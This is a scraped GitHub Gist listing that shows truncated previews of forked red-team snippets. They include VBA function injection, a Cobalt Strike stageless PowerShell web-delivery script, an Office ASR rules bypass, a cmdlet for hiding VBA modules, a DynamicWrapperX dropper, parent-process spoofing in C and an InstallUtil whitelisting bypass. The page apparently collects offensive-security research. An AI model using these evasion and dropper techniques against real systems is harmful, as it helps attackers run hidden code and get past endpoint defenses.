TechByTom
TechByTom
/ functioninjection.vba
Created
December 16, 2020 16:54
— forked from rmdavy/functioninjection.vba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long | |
| Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long | |
| Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long | |
| Const CC_STDCALL = 4 | |
| Const MEM_COMMIT = &H1000 | |
| Const PAGE_EXECUTE_READWRITE = &H40 | |
| Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long |
TechByTom
/ stagelessweb.cna
Created
September 1, 2020 16:14
— forked from rsmudge/stagelessweb.cna
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scripted Web Delivery (Stageless) | |
| # | |
| # This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
| # setup our stageless PowerShell Web Delivery attack | |
| sub setup_attack { | |
| local('%options $script $url $arch'); | |
| %options = $3; | |
| # get the arch right. |
TechByTom
/ ironregistry.py
Created
October 1, 2019 00:28
— forked from Graph-X/ironregistry.py
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Microsoft.Win32 import Registry | |
| from time import sleep | |
| rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
| rkey.SetValue(u'\x00 Im mr meeseeks',u'\x00look at me!') | |
| rkey.Close() | |
| rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
| values = rkey.GetValueNames() | |
| print("We have {0} values.".format(str(len(values)))) | |
| print("The value names returned are: {0}.".format(values[0])) | |
| value = rkey.GetValue(u'\x00 this is a test') |
TechByTom
/ ASR Rules Bypass.vba
Created
September 16, 2019 22:30
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
TechByTom
/ Invoke-HideVBAModule.psm1
Created
September 3, 2019 14:54
— forked from williamknows/Invoke-HideVBAModule.psm1
PowerShell cmdlet for hiding VBA modules in Microsoft Office documents
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code. | |
| Script created by William Knowles. @william_knows | |
| Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html | |
| .Description | |
| This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules. | |
| For the older compatibility formats you can edit the file directly with a hex editor and remove module references. | |
| For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file. |
TechByTom
/ get_certs.sh
Created
August 4, 2019 19:19
— forked from mikeabreu/get_certs.sh
Certificate Transparency Bash Functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Add these functions to your .bashrc or .zshrc and use from your terminal. | |
| get_certs_domains() { | |
| # Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994 | |
| curl -s https://crt.sh\?q\=%25.$1 | awk -v pattern="<TD>.*$1" '$0 ~ pattern {gsub("<[^>]*>","");gsub(//,""); print}' | sort -u | |
| } | |
| get_certs() { | |
| curl -s https://crt.sh\?q\=%25.$1 | awk '/\?id=[0-9]*/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' | sed 's/<TD style="text-align:center"><A href="?id=//g' | sed 's#">[0-9]*</A></TD>##g' | sed 's#<TD style="text-align:center">##g' | sed 's#</TD>##g' | sed 's#<TD>##g' | sed 's#<A style=["a-z: ?=0-9-]*>##g' | sed 's#</A>##g' | sed 'N;N;N;s/\n/\t\t/g' | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
TechByTom
/ dynwrapx.js
Created
June 2, 2019 19:47
DynamicWrapperX Dropper - Code Registration Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Example Reference: | |
| // https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; | |
| var fso = new ActiveXObject("Scripting.FileSystemObject"); | |
| var dropPath = fso.GetSpecialFolder(2); | |
| // Create Base64 Object, supports encode, decode | |
| var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac |
TechByTom
/ process_spoof.c
Created
June 1, 2019 23:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
| /* spoof.exe explorer.exe calc.exe */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
| typedef struct _STARTUPINFOEX { | |
| STARTUPINFO StartupInfo; | |
| LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
TechByTom
/ gethelp.cs
Created
May 13, 2019 15:15
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
NewerOlder